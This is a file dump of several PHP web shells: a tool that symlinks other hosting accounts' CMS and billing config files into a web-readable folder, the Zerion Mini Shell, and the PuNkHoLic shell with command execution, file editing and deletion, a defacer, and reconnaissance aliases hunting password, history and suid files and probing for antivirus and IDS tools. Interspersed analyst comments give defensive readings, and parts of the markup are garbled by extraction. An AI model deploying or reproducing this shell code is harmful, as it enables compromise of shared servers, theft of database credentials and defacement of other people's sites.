Welcome Bhai ji :) .. Configuration file killer welcomes you _/\_
open this link in new tab to run PHP.INI";
164 | echo $link;
165 |
166 | }
167 |
168 |
169 |
170 | ?>
171 |
172 |
173 |
185 |
186 | ";
// Analyst note (defensive reading): this branch runs when the POST field 'su' is present.
// It creates two mode-0777 directories, writes an .htaccess into each whose directives
// include "AddType text/plain .php", symlinks "/" to Indishell/root, and then, for every
// name in POST 'user', symlinks a fixed list of CMS / billing-panel config paths under
// /home/<name>/public_html/ into INDISHELL/. The apparent aim is to have the web server
// return other accounts' config files (which usually hold database credentials) as text.
// Indicators visible here: directories named Indishell / INDISHELL in a web root, an
// .htaccess carrying the directive string below, and symlinks in a docroot that point at
// "/" or at another account's home directory.
// Hardening that blunts this pattern: Apache "Options SymLinksIfOwnerMatch" in place of
// FollowSymLinks with AllowOverride not permitting Options, PHP open_basedir, "symlink"
// in disable_functions, and home directories that are not readable across accounts.
189 | if(isset($_POST['su']))
190 | {
191 | mkdir('Indishell',0777);
192 | $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
193 | $g = fopen('Indishell/.htaccess','w');
194 | fwrite($g,$rr);
195 | $indishell = symlink("/","Indishell/root");
196 | $rt="
OwN3d";
197 | echo "Bhai ji .... check link given below for / folder symlink
$rt";
198 |
// Second directory: same .htaccess content; this one receives the per-account config symlinks.
199 | $dir=mkdir('INDISHELL',0777);
200 | $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
201 | $f = fopen('INDISHELL/.htaccess','w');
202 |
203 | fwrite($f,$r);
204 | $consym="
configuration files";
205 | echo "
The link given below for configuration file symlink...open it, once processing finish
$consym";
206 |
// POST 'user' is split on newlines, one account name per line; each name is trimmed but
// otherwise used as-is when the /home/<name>/public_html/... target path is built.
207 | $usr=explode("\n",$_POST['user']);
208 | $configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php");
209 | foreach($usr as $uss )
210 | {
211 | $us=trim($uss);
212 |
213 | foreach($configuration as $c)
214 | {
215 | $rs="/home/".$us."/public_html/".$c;
216 | $r="INDISHELL/".$us.$c;
217 | symlink($rs,$r);
218 |
219 | }
220 |
221 | }
222 |
223 |
224 | }
225 |
226 |
227 |
228 | ?>
229 |
--------------------------------------------------------------------------------
/PHP/mini.php:
--------------------------------------------------------------------------------
1 | $value){
7 | $_POST[$key] = stripslashes($value);
8 | }
9 | }
10 | echo '
11 |
12 |
13 |
14 |
Mini Shell
15 |
53 |
54 |
55 |
56 | Mini Shell
57 |
58 |
';
102 | echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
');
103 | }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
104 | echo '
'.$_POST['path'].'
';
105 | if($_POST['opt'] == 'chmod'){
106 | if(isset($_POST['perm'])){
107 | if(chmod($_POST['path'],$_POST['perm'])){
108 | echo 'Change Permission Done.
';
109 | }else{
110 | echo 'Change Permission Error.
';
111 | }
112 | }
113 | echo '';
119 | }elseif($_POST['opt'] == 'rename'){
120 | if(isset($_POST['newname'])){
121 | if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
122 | echo 'Change Name Done.
';
123 | }else{
124 | echo 'Change Name Error.
';
125 | }
126 | $_POST['name'] = $_POST['newname'];
127 | }
128 | echo '';
134 | }elseif($_POST['opt'] == 'edit'){
135 | if(isset($_POST['src'])){
136 | $fp = fopen($_POST['path'],'w');
137 | if(fwrite($fp,$_POST['src'])){
138 | echo 'Edit File Done ~_^.
';
139 | }else{
140 | echo 'Edit File Error ~_~.
';
141 | }
142 | fclose($fp);
143 | }
144 | echo '';
150 | }
151 | echo '';
152 | }else{
153 | echo '
';
154 | if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
155 | if($_POST['type'] == 'dir'){
156 | if(rmdir($_POST['path'])){
157 | echo 'Delete Dir Done.
';
158 | }else{
159 | echo 'Delete Dir Error.
';
160 | }
161 | }elseif($_POST['type'] == 'file'){
162 | if(unlink($_POST['path'])){
163 | echo 'Delete File Done.
';
164 | }else{
165 | echo 'Delete File Error.
';
166 | }
167 | }
168 | }
169 | echo '';
170 | $scandir = scandir($path);
171 | echo '
';
243 | }
244 | echo '
Zerion Mini Shell 1.0
245 |
246 | ';
// Build the ten-character `ls -l` style mode string for a path: one file-type letter
// followed by the owner, group and world rwx triads. A set setuid/setgid/sticky bit is
// shown as s/s/t when the matching execute bit is set and as S/S/T when it is not.
// The mode comes straight from fileperms($file).
function perms($file){
    $mode = fileperms($file);

    // File-type masks, tried in this order; the first mask fully contained in the mode wins.
    $typeMasks = array(
        0xC000 => 's', // Socket
        0xA000 => 'l', // Symbolic Link
        0x8000 => '-', // Regular
        0x6000 => 'b', // Block special
        0x4000 => 'd', // Directory
        0x2000 => 'c', // Character special
        0x1000 => 'p', // FIFO pipe
    );
    $text = 'u'; // Unknown, unless a mask below matches
    foreach ($typeMasks as $mask => $letter) {
        if (($mode & $mask) == $mask) {
            $text = $letter;
            break;
        }
    }

    // Each row: read bit, write bit, execute bit, special bit, letter shown when the
    // special bit is set with execute, letter shown when it is set without execute.
    $triads = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), // Owner (setuid)
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), // Group (setgid)
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), // World (sticky)
    );
    foreach ($triads as $row) {
        list($readBit, $writeBit, $execBit, $specialBit, $withExec, $withoutExec) = $row;
        $text .= ($mode & $readBit) ? 'r' : '-';
        $text .= ($mode & $writeBit) ? 'w' : '-';
        if ($mode & $execBit) {
            $text .= ($mode & $specialBit) ? $withExec : 'x';
        } else {
            $text .= ($mode & $specialBit) ? $withoutExec : '-';
        }
    }

    return $text;
}
302 | ?>
303 |
--------------------------------------------------------------------------------
/PHP/punk-nopass.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
PuNkHoLic shell
4 |
5 |
6 |
43 |
44 |
45 |
46 | "dir",
75 | "Find index.php in current dir" => "dir /s /w /b index.php",
76 | "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
77 | "Show active connections" => "netstat -an",
78 | "Show running services" => "net start",
79 | "User accounts" => "net user",
80 | "Show computers" => "net view",
81 | "ARP Table" => "arp -a",
82 | "IP Configuration" => "ipconfig /all"
83 | );
84 | }
85 | else{
86 | $aliases = array(
87 | "List dir" => "ls -la",
88 | "list file attributes on a Linux second extended file system" => "lsattr -va",
89 | "show opened ports" => "netstat -an | grep -i listen",
90 | "Find" => "",
91 | "find all suid files" => "find / -type f -perm -04000 -ls",
92 | "find suid files in current dir" => "find . -type f -perm -04000 -ls",
93 | "find all sgid files" => "find / -type f -perm -02000 -ls",
94 | "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
95 | "find config.inc.php files" => "find / -type f -name config.inc.php",
96 | "find config* files" => "find / -type f -name \"config*\"",
97 | "find config* files in current dir" => "find . -type f -name \"config*\"",
98 | "find all writable folders and files" => "find / -perm -2 -ls",
99 | "find all writable folders and files in current dir" => "find . -perm -2 -ls",
100 | "find all service.pwd files" => "find / -type f -name service.pwd",
101 | "find service.pwd files in current dir" => "find . -type f -name service.pwd",
102 | "find all .htpasswd files" => "find / -type f -name .htpasswd",
103 | "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
104 | "find all .bash_history files" => "find / -type f -name .bash_history",
105 | "find .bash_history files in current dir" => "find . -type f -name .bash_history",
106 | "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
107 | "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
108 | "Locate" => "",
109 | "locate httpd.conf files" => "locate httpd.conf",
110 | "locate vhosts.conf files" => "locate vhosts.conf",
111 | "locate proftpd.conf files" => "locate proftpd.conf",
112 | "locate psybnc.conf files" => "locate psybnc.conf",
113 | "locate my.conf files" => "locate my.conf",
114 | "locate admin.php files" =>"locate admin.php",
115 | "locate cfg.php files" => "locate cfg.php",
116 | "locate conf.php files" => "locate conf.php",
117 | "locate config.dat files" => "locate config.dat",
118 | "locate config.php files" => "locate config.php",
119 | "locate config.inc files" => "locate config.inc",
120 | "locate config.inc.php" => "locate config.inc.php",
121 | "locate config.default.php files" => "locate config.default.php",
122 | "locate config* files " => "locate config",
123 | "locate .conf files"=>"locate '.conf'",
124 | "locate .pwd files" => "locate '.pwd'",
125 | "locate .sql files" => "locate '.sql'",
126 | "locate .htpasswd files" => "locate '.htpasswd'",
127 | "locate .bash_history files" => "locate '.bash_history'",
128 | "locate .mysql_history files" => "locate '.mysql_history'",
129 | "locate .fetchmailrc files" => "locate '.fetchmailrc'",
130 | "locate backup files" => "locate backup",
131 | "locate dump files" => "locate dump",
132 | "locate priv files" => "locate priv"
133 | );
134 | }
// Analyst note (defensive reading): when POST 'p1' equals 'deface', the content fetched
// from $deface_url (defined outside this excerpt) is written to the path formed by
// concatenating POST 'c' and POST 'p2'. Neither value is validated here, so this is an
// overwrite of any file the PHP user can write. Unexpected content changes to index
// files, together with POST bodies carrying p1=deface, are the traces to look for.
135 | if(isset($_POST['p1']) && $_POST['p1']=='deface') {
136 | $def = file_get_contents($deface_url);
137 | file_put_contents($_POST['c'].$_POST['p2'],$def);
138 | }
// Analyst note (defensive reading): runs $in as an OS command and returns its output as a
// string, trying several PHP primitives in order and using the first whose check passes.
// The first check hands ' exec ' (with surrounding spaces) to function_exists(), which is
// not the name of the built-in, so as written the chain effectively starts at passthru();
// the remaining fallbacks are system(), shell_exec() and finally popen().
// The "@" prefixes suppress PHP warnings raised by those calls.
// Hardening/detection: every primitive named here belongs in disable_functions on hosts
// that do not need it, and a web-server worker process spawning a shell or system
// utilities is a high-signal event in process telemetry.
139 | function ex($in) {
140 | $out = '';
141 | if ( function_exists(' exec ')) {
142 | @exec($in,$out);
143 | $out = @join("\n",$out);
144 | }elseif(function_exists('passthru')) {
// passthru() and system() write straight to output, so it is captured with a buffer.
145 | ob_start();
146 | @passthru($in);
147 | $out = ob_get_clean();
148 | }elseif(function_exists('system')) {
149 | ob_start();
150 | @system($in);
151 | $out = ob_get_clean();
152 | }elseif(function_exists('shell_exec')) {
153 | $out = shell_exec($in);
154 | }elseif(is_resource($f = @popen($in,"r"))) {
// Last resort: read the child's stdout through a pipe in 1024-byte chunks.
155 | $out = "";
156 | while(!@feof($f))
157 | $out .= fread($f,1024);
158 | pclose($f);
159 | }
160 | return $out;
161 | }
// Returns the output of `which <p>` obtained through ex(), or false when that output is
// empty. $p is concatenated into the command line without escaping. Elsewhere on this page
// it is called with fixed lists of compiler, interpreter, downloader and security-tool
// names, i.e. it is the probe behind the shell's host inventory.
162 | function which($p) {
163 | $path = ex('which '.$p);
164 | if(!empty($path))
165 | return $path;
166 | return false;
167 | }
168 | function printHeader() {
169 | if(empty($_POST['charset']))
170 | $_POST['charset'] = "UTF-8";
171 | global $color;
172 | global $Theme;
173 | global $TabsColor;
174 | echo "
";
175 | echo '
176 |
PuNkHoLic Shell
177 |
227 |
228 |

229 |
278 |
279 |
';
287 | $freeSpace = @diskfreespace($GLOBALS['cwd']);
288 | $totalSpace = @disk_total_space($GLOBALS['cwd']);
289 | $totalSpace = $totalSpace?$totalSpace:1;
290 | $disable_functions = @ini_get('disable_functions');
291 | $release = @php_uname('r');
292 | $kernel = @php_uname('s');
293 | if(!function_exists('posix_getegid')) {
294 | $user = @get_current_user();
295 | $uid = @getmyuid();
296 | $gid = @getmygid();
297 | $group = "?";
298 | } else {
299 | $uid = @posix_getpwuid(@posix_geteuid());
300 | $gid = @posix_getgrgid(@posix_getegid());
301 | $user = $uid['name'];
302 | $uid = $uid['uid'];
303 | $group = $gid['name'];
304 | $gid = $gid['gid'];
305 | }
306 | $cwd_links = '';
307 | $path = explode("/", $GLOBALS['cwd']);
308 | $n=count($path);
309 | for($i=0;$i<$n-1;$i++) {
310 | $cwd_links .= "
".$path[$i]."/";
314 | }
315 | $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
316 | $opt_charsets = '';
317 | foreach($charsets as $item)
318 | $opt_charsets .= '
';
319 | $m = array('Import Scripts'=>'ImportScripts','Jumping'=>'Jumping','Symlink'=>'Symlink','Domains' => 'Domain','Shared Hostings'=>'Shared','Sym Sites'=>'Sym','Subdomain'=>'Subdomain','Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Safe Mode'=>'Bypass','String tools'=>'StringTools','Defacer' => 'Deface','Recursive Defacer'=>'Defacer');
320 | if(!empty($GLOBALS['auth_pass']))
321 | $m['Logout'] = 'Logout';
322 | $menu = '';
323 | foreach($m as $k => $v)
324 | $menu .= '
'.$k.' | ';
325 | $drives = "";
326 | if ($GLOBALS['os'] == 'win') {
327 | foreach( range('a','z') as $drive ){
328 | if (is_dir($drive.':\\'))
329 | $drives .= '
[ '.$drive.' ] ';
330 | }
331 | $drives .= '
: ';
332 | }
333 | if($GLOBALS['os'] == 'nix') {
334 | $dominios = @file_get_contents("/etc/named.conf");
335 | if(!$dominios) {
336 | $DomainS = "/var/named";
337 | $Domainonserver = scandir($DomainS);
338 | $d0c = count($Domainonserver);
339 | } else {
340 | @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
341 | $out = sizeof(array_unique($out[1]));
342 | $d0c = $out."Domains";
343 | }
344 | } else {
345 | $d0c = "Nothing here bro:(";
346 | }
347 | if($GLOBALS['os'] == 'nix' )
348 | {
349 | $usefl = ''; $dwnldr = '';
350 | if(!@ini_get('safe_mode')) {
351 | $temp = array();
352 | $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
353 | foreach($userful as $item) { if(which($item)) $temp[]= $item; }
354 | $usefl = implode(', ',$temp);
355 | $temp = array();
356 | $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
357 | foreach($downloaders as $item2) { if(which($item2)) $temp[]= $item2; }
358 | $dwnldr = implode(', ',$temp);
359 | } else {
360 | $usefl = ' ------- '; $dwnldr = ' ------- ';
361 | }
362 | } else {
363 | $usefl = ' ------- '; $dwnldr = ' ------- ';
364 | }
365 | echo '
366 | Uname | : '.substr(@php_uname(), 0, 120).' |
367 | User | : '.$uid.' ( '.$user.' ) Group: '.$gid.' ( '.$group.' ) | Server | : '.@getenv('SERVER_SOFTWARE').' | Useful | : '.$usefl.' | Downloaders | : '.$dwnldr.' | D/functions | : '.($disable_functions?$disable_functions:'All Function Enable').' | '.($GLOBALS['os'] == 'win'?'Drives Cwd':'Cwd').' | : '.$drives.''.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' [ home ] |
| '.
368 | 'Sv IP Your IP HDD Free PHP Safe Mode Domains | '.
369 | ': '.gethostbyname($_SERVER["HTTP_HOST"]).' : '.$_SERVER['REMOTE_ADDR'].' : '.viewSize($totalSpace).' : '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%) : '.@phpversion().' [ phpinfo ] : '.($GLOBALS['safe_mode']?'ON':'OFF').' : '.$d0c.' |
'.
370 | '
';
371 | }
372 | function printFooter() {
373 | $is_writable = is_writable($GLOBALS['cwd'])?"[ Writeable ]":"[ Not writable ]";
374 | echo '
394 |
395 |
396 | ';
397 | }
// Fallback stubs: when posix_getpwuid / posix_getgrgid do not exist and their names are
// not found in $GLOBALS['disable_functions'], define versions that simply return false,
// so later calls to them do not abort the script with an undefined-function error.
398 | if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
399 | if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
// Format a byte count for display: two decimals with a GB / MB / KB suffix once the value
// reaches the corresponding power of 1024, otherwise the raw value followed by " B".
function viewSize($s) {
    // Largest unit first, so the first threshold reached decides the suffix.
    $units = array(
        ' GB' => 1073741824,
        ' MB' => 1048576,
        ' KB' => 1024,
    );
    foreach ($units as $suffix => $divisor) {
        if ($s >= $divisor) {
            return sprintf('%1.2f', $s / $divisor) . $suffix;
        }
    }
    return $s . ' B';
}
// Turn a numeric file mode ($p, as produced by fileperms()) into the ten-character
// `ls -l` style string: file-type letter plus owner, group and world triads.
// setuid / setgid / sticky appear as s / s / t when the matching execute bit is set and
// as S / S / T when it is not, which is the detail to read when auditing a listing.
function perms($p) {
    // Type letter => mask, tried in this order; the first mask fully present in $p wins.
    $kinds = array(
        's' => 0xC000,
        'l' => 0xA000,
        '-' => 0x8000,
        'b' => 0x6000,
        'd' => 0x4000,
        'c' => 0x2000,
        'p' => 0x1000,
    );
    $i = 'u';
    foreach ($kinds as $letter => $mask) {
        if (($p & $mask) == $mask) {
            $i = $letter;
            break;
        }
    }

    // read, write, execute, special bit, letter with execute, letter without execute
    $classes = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'),
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'),
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'),
    );
    foreach ($classes as $cls) {
        $i .= ($p & $cls[0]) ? 'r' : '-';
        $i .= ($p & $cls[1]) ? 'w' : '-';
        $special = ($p & $cls[3]) ? true : false;
        if ($p & $cls[2]) {
            $i .= $special ? $cls[4] : 'x';
        } else {
            $i .= $special ? $cls[5] : '-';
        }
    }
    return $i;
}
// Returns the perms() string for $f inside one of three string wrappers chosen by whether
// the path is unreadable, readable but not writable, or writable for the PHP user.
// NOTE(review): the markup inside the three literals appears to have been stripped when
// this page was extracted, so the branches look identical here; presumably they differed
// only in colour - confirm against an intact copy.
430 | function viewPermsColor($f) {
431 | if (!@is_readable($f))
432 | return '
'.perms(@fileperms($f)).'';
433 | elseif (!@is_writable($f))
434 | return '
'.perms(@fileperms($f)).'';
435 | else
436 | return '
'.perms(@fileperms($f)).'';
437 | }
// Fallback definition of scandir() for runtimes that lack the built-in: returns the raw
// readdir() entries of $dir (including "." and "..") in directory order.
// As in the original, the handle is not closed and $files is only created once the first
// entry has been read.
if (!function_exists("scandir")) {
    function scandir($dir) {
        $handle = opendir($dir);
        for (;;) {
            $entry = readdir($handle);
            if (false === $entry) {
                break;
            }
            $files[] = $entry;
        }
        return $files;
    }
}
// Analyst note (defensive reading): renders the shell's "Server security information"
// page. It echoes PHP hardening settings (disable_functions, open_basedir, safe-mode
// directories), which database client functions exist, whether /etc/passwd and
// /etc/shadow are readable by the PHP user, OS / distribution strings and, through
// which(), the build tools, downloaders and security products that are installed.
// Values are echoed without HTML escaping.
// For responders this is host reconnaissance: when $GLOBALS['safe_mode'] is falsy, one
// request to this action produces a burst of `which <name>` child processes plus `df -h`
// under the web-server account, which process auditing will show.
447 | function actionSecInfo() {
448 | printHeader();
449 | echo '
Server security information
';
// Nested helper: prints "<name>: <value>" when the trimmed value is non-empty; the value
// is laid out differently when it contains a newline.
450 | function showSecParam($n, $v) {
451 | $v = trim($v);
452 | if($v) {
453 | echo '
'.$n.': ';
454 | if(strpos($v, "\n") === false)
455 | echo $v.'
';
456 | else
457 | echo '
'.$v.'
';
458 | }
459 | }
// PHP-level posture: these settings tell the operator which restrictions are in force.
460 | showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
461 | showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
462 | showSecParam('Open base dir', @ini_get('open_basedir'));
463 | showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
464 | showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
465 | showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
466 | $temp=array();
467 | if(function_exists('mysql_get_client_info'))
468 | $temp[] = "MySql (".mysql_get_client_info().")";
469 | if(function_exists('mssql_connect'))
470 | $temp[] = "MSSQL";
471 | if(function_exists('pg_connect'))
472 | $temp[] = "PostgreSQL";
473 | if(function_exists('oci_connect'))
474 | $temp[] = "Oracle";
475 | showSecParam('Supported databases', implode(', ', $temp));
476 | echo '
';
477 | if( $GLOBALS['os'] == 'nix' ) {
478 | $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
// $danger holds names that include antivirus, rootkit checkers, firewalls and IDS /
// log-monitoring tools (e.g. clamd, rkhunter, chkrootkit, iptables, snort, ossec,
// tripwire); only their presence on PATH is probed below.
479 | $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
480 | $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
481 | showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes
[view]":'no');
482 | showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes
[view]":'no');
483 | showSecParam('OS version', @file_get_contents('/proc/version'));
484 | showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
485 | if(!$GLOBALS['safe_mode']) {
486 | echo '
';
487 | $temp=array();
488 | foreach ($userful as $item)
489 | if(which($item)){$temp[]=$item;}
490 | showSecParam('Userful', implode(', ',$temp));
491 | $temp=array();
492 | foreach ($danger as $item)
493 | if(which($item)){$temp[]=$item;}
494 | showSecParam('Danger', implode(', ',$temp));
495 | $temp=array();
496 | foreach ($downloaders as $item)
497 | if(which($item)){$temp[]=$item;}
498 | showSecParam('Downloaders', implode(', ',$temp));
499 | echo '
';
500 | showSecParam('Hosts', @file_get_contents('/etc/hosts'));
501 | showSecParam('HDD space', ex('df -h'));
502 | showSecParam('Mount options', @file_get_contents('/etc/fstab'));
503 | }
504 | } else {
// Non-'nix' branch: runs `ver`, `net accounts` and `net user` through ex().
505 | showSecParam('OS Version',ex('ver'));
506 | showSecParam('Account Settings',ex('net accounts'));
507 | showSecParam('User Accounts',ex('net user'));
508 | }
509 | echo '
';
510 | printFooter();
511 | }
512 | function actionFilesMan() {
513 | printHeader();
514 | echo '
File manager
';
515 | if(isset($_POST['p1']) && $_POST['p1']!='deface') {
516 | switch($_POST['p1']) {
517 | case 'uploadFile':
518 | if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
519 | echo "Can't upload file!";
520 | break;
521 | break;
522 | case 'mkdir':
523 | if(!@mkdir($_POST['p2']))
524 | echo "Can't create new dir";
525 | break;
526 | case 'delete':
527 | function deleteDir($path) {
528 | $path = (substr($path,-1)=='/') ? $path:$path.'/';
529 | $dh= opendir($path);
530 | while ( ($item = readdir($dh) ) !== false) {
531 | $item = $path.$item;
532 | if ( (basename($item) == "..") || (basename($item) == ".") )
533 | continue;
534 | $type = filetype($item);
535 | if ($type == "dir")
536 | deleteDir($item);
537 | else
538 | @unlink($item);
539 | }
540 | closedir($dh);
541 | rmdir($path);
542 | }
543 | if(is_array(@$_POST['f']))
544 | foreach($_POST['f'] as $f) {
545 | $f = urldecode($f);
546 | if(is_dir($f))
547 | deleteDir($f);
548 | else
549 | @unlink($f);
550 | }
551 | break;
552 | case 'paste':
553 | if($_SESSION['act'] == 'copy') {
554 | function copy_paste($c,$s,$d){
555 | if(is_dir($c.$s)){
556 | mkdir($d.$s);
557 | $h = opendir($c.$s);
558 | while (($f = readdir($h)) !== false)
559 | if (($f != ".") and ($f != "..")) {
560 | copy_paste($c.$s.'/',$f, $d.$s.'/');
561 | }
562 | } elseif(is_file($c.$s)) {
563 | @copy($c.$s, $d.$s);
564 | }
565 | }
566 | foreach($_SESSION['f'] as $f)
567 | copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
568 | } elseif($_SESSION['act'] == 'move') {
569 | function move_paste($c,$s,$d){
570 | if(is_dir($c.$s)){
571 | mkdir($d.$s);
572 | $h = opendir($c.$s);
573 | while (($f = readdir($h)) !== false)
574 | if (($f != ".") and ($f != "..")) {
575 | copy_paste($c.$s.'/',$f, $d.$s.'/');
576 | }
577 | } elseif(is_file($c.$s)) {
578 | @copy($c.$s, $d.$s);
579 | }
580 | }
581 | foreach($_SESSION['f'] as $f)
582 | @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
583 | }
584 | unset($_SESSION['f']);
585 | break;
586 | default:
587 | if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
588 | $_SESSION['act'] = @$_POST['p1'];
589 | $_SESSION['f'] = @$_POST['f'];
590 | foreach($_SESSION['f'] as $k => $f)
591 | $_SESSION['f'][$k] = urldecode($f);
592 | $_SESSION['cwd'] = @$_POST['c'];
593 | }
594 | break;
595 | }
596 | echo '';
597 | }
598 | $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
599 | if($dirContent === false) {echo 'Can\'t open this folder!'; return;}
600 | global $sort;
601 | $sort = array('name', 1);
602 | if(!empty($_POST['p1'])) {
603 | if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
604 | $sort = array($match[1], (int)$match[2]);
605 | }
606 | echo '
613 |
614 |
';
661 | printFooter();
662 | }
663 | function actionStringTools() {
664 | if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
665 | if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i
String conversions';
679 | $stringTools = array(
680 | 'Base64 encode' => 'base64_encode',
681 | 'Base64 decode' => 'base64_decode',
682 | 'Url encode' => 'urlencode',
683 | 'Url decode' => 'urldecode',
684 | 'Full urlencode' => 'full_urlencode',
685 | 'md5 hash' => 'md5',
686 | 'sha1 hash' => 'sha1',
687 | 'crypt' => 'crypt',
688 | 'CRC32' => 'crc32',
689 | 'ASCII to HEX' => 'ascii2hex',
690 | 'HEX to ASCII' => 'hex2ascii',
691 | 'HEX to DEC' => 'hexdec',
692 | 'HEX to BIN' => 'hex2bin',
693 | 'DEC to HEX' => 'dechex',
694 | 'DEC to BIN' => 'decbin',
695 | 'BIN to HEX' => 'bin2hex',
696 | 'BIN to DEC' => 'bindec',
697 | 'String to lower case' => 'strtolower',
698 | 'String to upper case' => 'strtoupper',
699 | 'Htmlspecialchars' => 'htmlspecialchars',
700 | 'String length' => 'strlen',
701 | );
702 | if(empty($_POST['ajax'])&&!empty($_POST['p1']))
703 | $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
704 | echo "
";
708 | if(!empty($_POST['p1'])) {
709 | if(function_exists($_POST['p1']))
710 | echo htmlspecialchars($_POST['p1']($_POST['p2']));
711 | }
712 | echo"
";
713 | printFooter();
714 | }
715 | function actionFilesTools() {
716 | if( isset($_POST['p1']) )
717 | $_POST['p1'] = urldecode($_POST['p1']);
718 | if(@$_POST['p2']=='download') {
719 | if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
720 | ob_start("ob_gzhandler", 4096);
721 | header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
722 | if (function_exists("mime_content_type")) {
723 | $type = @mime_content_type($_POST['p1']);
724 | header("Content-Type: ".$type);
725 | }
726 | $fp = @fopen($_POST['p1'], "r");
727 | if($fp) {
728 | while(!@feof($fp))
729 | echo @fread($fp, 1024);
730 | fclose($fp);
731 | }
732 | } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
733 | }
734 | exit;
735 | }
736 | if( @$_POST['p2'] == 'mkfile' ) {
737 | if(!file_exists($_POST['p1'])) {
738 | $fp = @fopen($_POST['p1'], 'w');
739 | if($fp) {
740 | $_POST['p2'] = "edit";
741 | fclose($fp);
742 | }
743 | }
744 | }
745 | printHeader();
746 | echo 'File tools
';
747 | if( !file_exists(@$_POST['p1']) ) {
748 | echo 'File not exists';
749 | printFooter();
750 | return;
751 | }
752 | $uid = @posix_getpwuid(@fileowner($_POST['p1']));
753 | $gid = @posix_getgrgid(@fileowner($_POST['p1']));
754 | echo '
Name: '.htmlspecialchars($_POST['p1']).'
Size: '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').'
Permission: '.viewPermsColor($_POST['p1']).'
Owner/Group: '.$uid['name'].'/'.$gid['name'].'
';
755 | echo '
Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).'
Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).'
Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'
';
756 | if( empty($_POST['p2']) )
757 | $_POST['p2'] = 'view';
758 | if( is_file($_POST['p1']) )
759 | $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
760 | else
761 | $m = array('Chmod', 'Rename', 'Touch');
762 | foreach($m as $v)
763 | echo '
'.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' ';
764 | echo '
';
765 | switch($_POST['p2']) {
766 | case 'view':
767 | echo '
';
768 | $fp = @fopen($_POST['p1'], 'r');
769 | if($fp) {
770 | while( !@feof($fp) )
771 | echo htmlspecialchars(@fread($fp, 1024));
772 | @fclose($fp);
773 | }
774 | echo '
';
775 | break;
776 | case 'highlight':
